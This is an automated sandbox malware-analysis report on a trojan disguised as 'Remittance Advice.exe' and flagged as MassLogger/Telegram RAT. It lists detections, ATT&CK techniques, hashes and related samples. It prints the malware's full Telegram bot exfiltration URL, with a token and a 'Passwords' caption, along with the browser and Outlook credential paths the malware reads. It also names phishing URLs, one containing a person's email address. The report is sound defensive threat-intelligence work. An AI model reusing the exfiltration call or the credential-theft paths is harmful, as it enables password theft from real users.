Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7068, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Remittance Advice.exe	74%	Virustotal		Browse
Remittance Advice.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.MassloggerRAT
Remittance Advice.exe	100%	Avira	HEUR/AGEN.1306813
Remittance Advice.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.32.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org	RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189l	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.comd	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.orgd	RegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189d	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.orgd	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410	RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.orgd	RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.000000000261E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/d	RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000003.00000002.3925485260.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.32.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589988
Start date and time:	2025-01-13 13:04:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Remittance Advice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 25 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:05:37	API Interceptor	10033464x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse
104.21.32.1	24010-KAPSON.exe	Get hash	malicious	Azorult, GuLoader	Browse	b2csa.icu/PL341/index.php
	bIcqeSVPW6.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/sa6l/
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	www.masterqq.pro/3vdc/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php
193.122.130.0	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
checkip.dyndns.com	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
api.telegram.org	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse	149.154.167.220
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	149.154.167.99
	http://www.eovph.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://www.eghwr.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegrams-mc.org/	Get hash	malicious	Unknown	Browse	149.154.170.96
	https://telegramerong.cc/app/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://telegramerong.cc/app	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
ORACLE-BMC-31898US	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	trow.exe	Get hash	malicious	Unknown	Browse	147.154.3.56
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
CLOUDFLARENETUS	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	104.19.132.76
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	https://smartbooking.ma/	Get hash	malicious	Unknown	Browse	188.114.97.3
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	https://connexion-pro.support/adobe/s/assets/	Get hash	malicious	Unknown	Browse	104.21.11.138
	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	g5.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://aeromorning.com	Get hash	malicious	Unknown	Browse	104.26.4.102
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	elitebotnet.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	172.68.1.238

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	Unknown	Browse	104.21.32.1
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
3b5074b1b5d032e5620f69f9f700ff0e	https://email.mg.decisiontime.online/c/eJxszjFvszAQgOFfYzbQ-c4mMHj4pK_M3TqDOZdTjR1hJyj_vkqVMeujd3hXZxnHi2_Y6Qv1hohgaHifJbbhyHu75n2W5M7z7Fb2UiSnKjt3OUVJ_CqjpJ9WVoeoxwEvL62PKz9VN5szGsd5AQoLgV-oZ2_1oPuFgrWAvWnEIaAFDaM2ZGHoAsy0DGwY2VpNoAzs328fottqvRZF_xROCqeyFV_flQonDLPC6c6HhEfr8_q0v9vmcB9xlsTdl8SS0__8qQyUfKsbH6ket1K7rfgkXeLa3B3-BgAA__-9dmXG	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	invnoIL438805.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Shipping Docs Waybill No 2009 xxxx 351.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	wuknbFMdeq.exe	Get hash	malicious	FunkLocker	Browse	149.154.167.220
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Remittance Advice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.742494265751586
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Remittance Advice.exe
File size:	205'312 bytes
MD5:	667efc5a5ac024a15ce73a7a352ea598
SHA1:	8b040298902662570d584fc468c8f45f35c47396
SHA256:	98bd32336d5f7ccc755b7957803a881a51dafb9efad7d577befc431690469787
SHA512:	1f1ceafe3eefd26ce784da5fcc56e81d47be172001b6ea27daeb6d6a6149f77492e6c8c50b4f70815cd0f96856d78660f8c0612c5f8d236ba1ce5dd6fe5af7bb
SSDEEP:	3072:uXjI4IweUBbWrT1KS2pgGjfdF3vUcroEJEJ2WTi5Jg/N2FF:uTI6evHugGjfd1vUqofJ2fg
TLSH:	DC14F5A017B67E35D9947F3EAE6601DE3A5D38E37039EEADFE485006CA402B4B51436C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZA................0..............7... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43371e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
